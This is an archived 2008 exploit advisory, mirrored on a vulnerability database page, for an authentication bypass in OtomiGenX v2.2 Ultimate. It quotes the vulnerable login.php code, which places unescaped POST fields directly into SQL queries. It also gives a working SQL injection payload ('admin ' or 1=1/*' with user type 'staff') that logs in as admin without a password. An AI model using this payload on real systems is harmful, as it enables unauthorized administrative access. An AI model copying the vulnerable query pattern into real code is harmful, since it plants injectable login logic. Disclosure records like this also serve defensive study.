Lucene search
K

otomigenx-bypass.txt

🗓️ 02 Jun 2008 00:00:00Reported by hadihadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

OtomiGenX v2.2 Ultimate Authentication bypass Vulnerabilities. Exploit via admin Authentication bypass vuln in login.php

Code
`   
######################################################################################  
# #  
# ...::::: OtomiGenX v2.2 Ultimate Authentication bypass Vulnerabilities ::::.... #   
######################################################################################  
  
Virangar Security Team  
  
www.virangar.net  
www.virangar.ir  
--------  
Discoverd By :virangar security team(hadihadi)  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)   
----------------  
.::::admin Authentication bypass vuln::::.  
//vuln code in login.php:  
...  
..  
...  
line 29:  
  
$passwd = md5($_POST[userPassword]); // md5 hash password  
  
if($_POST[userType] != 'Staff')  
{$sql = "SELECT userID, userName   
FROM user_account   
WHERE userAccount='$_POST[userAccount]' AND   
userPassword='$passwd' AND   
userType='$_POST[userType]' AND isApproved='1'";  
  
}else  
$sql = "SELECT staffID, staffName, staffGroupID   
FROM staff   
WHERE staffAccount='$_POST[userAccount]' AND   
staffPassword='$passwd'";  
...  
  
  
-----  
Exploit:  
User Name:admin ' or 1=1/*  
Password :[whatever]  
usertype:staff  
--------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4
28